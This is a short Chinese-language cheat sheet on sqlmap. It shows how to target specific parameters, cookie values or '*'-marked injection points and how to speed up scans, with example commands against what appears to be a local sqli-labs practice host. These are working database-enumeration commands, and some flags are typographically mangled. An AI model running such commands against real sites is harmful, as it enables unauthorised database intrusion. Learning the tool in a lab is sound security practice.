一、指定位置注入
1、-p,指定具体探测的参数
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1 -p id --dbs 对id进行探测
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2 -p “id,name” --dbs 对id和name都进行探测
2、–skip,忽略探测的参数
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --level 5 --skip host --dbs 5级对所有存在的注入点进行探测,这里忽略了host
3、–param-exclude,忽略包含具体内容的参数
–param-exclude=“id|name”
4、–skip-static 忽略非动态参数
5、用“*”指定注入位置,
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1*&&name=2*&&tab=3 --dbs
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2&&tab=3 --cookie=“un=adm*;pw=adm”–dbs
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2&&tab=3 --cookie="*"–dbs
二、优化性能
1、设置连接为持久连接
http报文中设置Connection:Keep-Alive
sqlmap中加参数 --keep-alive
2、设置不接受http当中的body,常用在盲注
–null-connection
3、设置多线程
–thread 默认是1个线程,最大线程为10
4、预测输出
–predict-output,不能与thread同时用
5、开启所有优化
-o
禁止非法,后果自负